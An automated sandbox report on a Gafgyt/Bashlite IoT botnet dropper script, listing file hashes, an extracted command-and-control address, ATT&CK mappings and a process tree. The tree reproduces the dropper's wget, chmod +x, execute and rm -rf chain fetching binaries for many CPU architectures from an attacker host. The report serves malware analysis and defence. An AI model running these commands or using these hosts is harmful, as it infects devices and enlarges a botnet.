gafgyt | 3b2320de1e6753a8a4d12b51a344b8cb4302f5e6494685d9eb9b068223e17e07

Analysis

max time kernel
92s
max time network
154s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
20/02/2025, 20:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

felka.sh
Size

2KB
MD5

5922ebab69b093d45bcfaf633ae691be
SHA1

7be49c2aaf8e6db8b1f1f04791cc9c81f7c9821c
SHA256

3b2320de1e6753a8a4d12b51a344b8cb4302f5e6494685d9eb9b068223e17e07
SHA512

38b19bb1ee69b0081b19b47416dd8e7e593fc641d9c44d64417b8e2cf7056dbd5ad933fa5c009f42324475b33b8d1edb9e809a86382112547bd58ff22a27ec77

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

15.204.128.30:6140

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
698	chmod
751	chmod
775	chmod
795	chmod
823	chmod
834	chmod
713	chmod
808	chmod
678	chmod
690	chmod
724	chmod
736	chmod
769	chmod
784	chmod
829	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/felkawtf.armv4l	680	felka.sh

Reads system routing table 1 TTPs 4 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	felkawtf.armv4l
File opened for reading	/proc/net/route	felkawtf.armv5l
File opened for reading	/proc/net/route	felkawtf.armv6l
File opened for reading	/proc/net/route	felkawtf.armv7l

Reads system network configuration 1 TTPs 4 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	felkawtf.armv4l
File opened for reading	/proc/net/route	felkawtf.armv5l
File opened for reading	/proc/net/route	felkawtf.armv6l
File opened for reading	/proc/net/route	felkawtf.armv7l

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
773	wget
776	felkawtf.mips
778	rm
779	wget
786	felkawtf.mipsel
789	rm

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/felkawtf.powerpc-440fp	wget
File opened for modification	/tmp/felkawtf.sh4	wget
File opened for modification	/tmp/felkawtf.sparc	wget
File opened for modification	/tmp/felkawtf.armv7l	wget
File opened for modification	/tmp/felkawtf.i686	wget
File opened for modification	/tmp/felkawtf.mips	wget
File opened for modification	/tmp/felkawtf.mipsel	wget
File opened for modification	/tmp/felkawtf.x86	wget
File opened for modification	/tmp/felkawtf.armv4l	wget
File opened for modification	/tmp/felkawtf.armv5l	wget
File opened for modification	/tmp/felkawtf.armv6l	wget
File opened for modification	/tmp/felkawtf.i586	wget
File opened for modification	/tmp/felkawtf.m68k	wget

/tmp/felka.sh
/tmp/felka.sh
1⤵
- Executes dropped EXE
PID:655
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.armv4l
  2⤵
  - Writes file to tmp directory
  PID:657
- /bin/chmod
  chmod +x felkawtf.armv4l
  2⤵
  - File and Directory Permissions Modification
  PID:678
- /tmp/felkawtf.armv4l
  ./felkawtf.armv4l
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:680
- /bin/rm
  rm -rf felkawtf.armv4l
  2⤵
  PID:683
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.armv5l
  2⤵
  - Writes file to tmp directory
  PID:684
- /bin/chmod
  chmod +x felkawtf.armv5l
  2⤵
  - File and Directory Permissions Modification
  PID:690
- /tmp/felkawtf.armv5l
  ./felkawtf.armv5l
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:691
- /bin/rm
  rm -rf felkawtf.armv5l
  2⤵
  PID:694
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.armv6l
  2⤵
  - Writes file to tmp directory
  PID:695
- /bin/chmod
  chmod +x felkawtf.armv6l
  2⤵
  - File and Directory Permissions Modification
  PID:698
- /tmp/felkawtf.armv6l
  ./felkawtf.armv6l
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:699
- /bin/rm
  rm -rf felkawtf.armv6l
  2⤵
  PID:702
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.armv7l
  2⤵
  - Writes file to tmp directory
  PID:703
- /bin/chmod
  chmod +x felkawtf.armv7l
  2⤵
  - File and Directory Permissions Modification
  PID:713
- /tmp/felkawtf.armv7l
  ./felkawtf.armv7l
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:714
- /bin/rm
  rm -rf felkawtf.armv7l
  2⤵
  PID:718
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.i486
  2⤵
  PID:719
- /bin/chmod
  chmod +x felkawtf.i486
  2⤵
  - File and Directory Permissions Modification
  PID:724
- /tmp/felkawtf.i486
  ./felkawtf.i486
  2⤵
  PID:725
- /bin/rm
  rm -rf felkawtf.i486
  2⤵
  PID:727
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.i586
  2⤵
  - Writes file to tmp directory
  PID:728
- /bin/chmod
  chmod +x felkawtf.i586
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/felkawtf.i586
  ./felkawtf.i586
  2⤵
  PID:737
- /bin/rm
  rm -rf felkawtf.i586
  2⤵
  PID:741
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.i686
  2⤵
  - Writes file to tmp directory
  PID:743
- /bin/chmod
  chmod +x felkawtf.i686
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/felkawtf.i686
  ./felkawtf.i686
  2⤵
  PID:753
- /bin/rm
  rm -rf felkawtf.i686
  2⤵
  PID:756
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.m68k
  2⤵
  - Writes file to tmp directory
  PID:757
- /bin/chmod
  chmod +x felkawtf.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:769
- /tmp/felkawtf.m68k
  ./felkawtf.m68k
  2⤵
  PID:770
- /bin/rm
  rm -rf felkawtf.m68k
  2⤵
  PID:772
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:773
- /bin/chmod
  chmod +x felkawtf.mips
  2⤵
  - File and Directory Permissions Modification
  PID:775
- /tmp/felkawtf.mips
  ./felkawtf.mips
  2⤵
  - System Network Configuration Discovery
  PID:776
- /bin/rm
  rm -rf felkawtf.mips
  2⤵
  - System Network Configuration Discovery
  PID:778
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:779
- /bin/chmod
  chmod +x felkawtf.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:784
- /tmp/felkawtf.mipsel
  ./felkawtf.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:786
- /bin/rm
  rm -rf felkawtf.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:789
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.ppc
  2⤵
  PID:790
- /bin/chmod
  chmod +x felkawtf.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:795
- /tmp/felkawtf.ppc
  ./felkawtf.ppc
  2⤵
  PID:797
- /bin/rm
  rm -rf felkawtf.ppc
  2⤵
  PID:798
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.powerpc-440fp
  2⤵
  - Writes file to tmp directory
  PID:800
- /bin/chmod
  chmod +x felkawtf.powerpc-440fp
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/felkawtf.powerpc-440fp
  ./felkawtf.powerpc-440fp
  2⤵
  PID:810
- /bin/rm
  rm -rf felkawtf.powerpc-440fp
  2⤵
  PID:812
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.sh4
  2⤵
  - Writes file to tmp directory
  PID:813
- /bin/chmod
  chmod +x felkawtf.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/felkawtf.sh4
  ./felkawtf.sh4
  2⤵
  PID:825
- /bin/rm
  rm -rf felkawtf.sh4
  2⤵
  PID:827
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.sparc
  2⤵
  - Writes file to tmp directory
  PID:828
- /bin/chmod
  chmod +x felkawtf.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/felkawtf.sparc
  ./felkawtf.sparc
  2⤵
  PID:830
- /bin/rm
  rm -rf felkawtf.sparc
  2⤵
  PID:832
- /usr/bin/wget
  wget http://5.252.176.168/felkawtf.x86
  2⤵
  - Writes file to tmp directory
  PID:833
- /bin/chmod
  chmod +x felkawtf.x86
  2⤵
  - File and Directory Permissions Modification
  PID:834
- /tmp/felkawtf.x86
  ./felkawtf.x86
  2⤵
  PID:835
- /bin/rm
  rm -rf felkawtf.x86
  2⤵
  PID:837

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/felkawtf.armv4l

Filesize
103KB

MD5
65e82ae08897c4aa2fabd0fbdf03e517

SHA1
103458b043607d921cfc6ee9bc9fd3151f73e9c2

SHA256
7691bc26f63eba56f496d5e610ab9cbbfd1b1b39f27b5571dd59a799c3334b72

SHA512
3405418e789d1362344bb636f60cd223e8460328949cec5f02935136002a4afeef66ac4dd959dd9f35310e2a0012f2077466ce5e8919de96d3f56d006db463fe

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads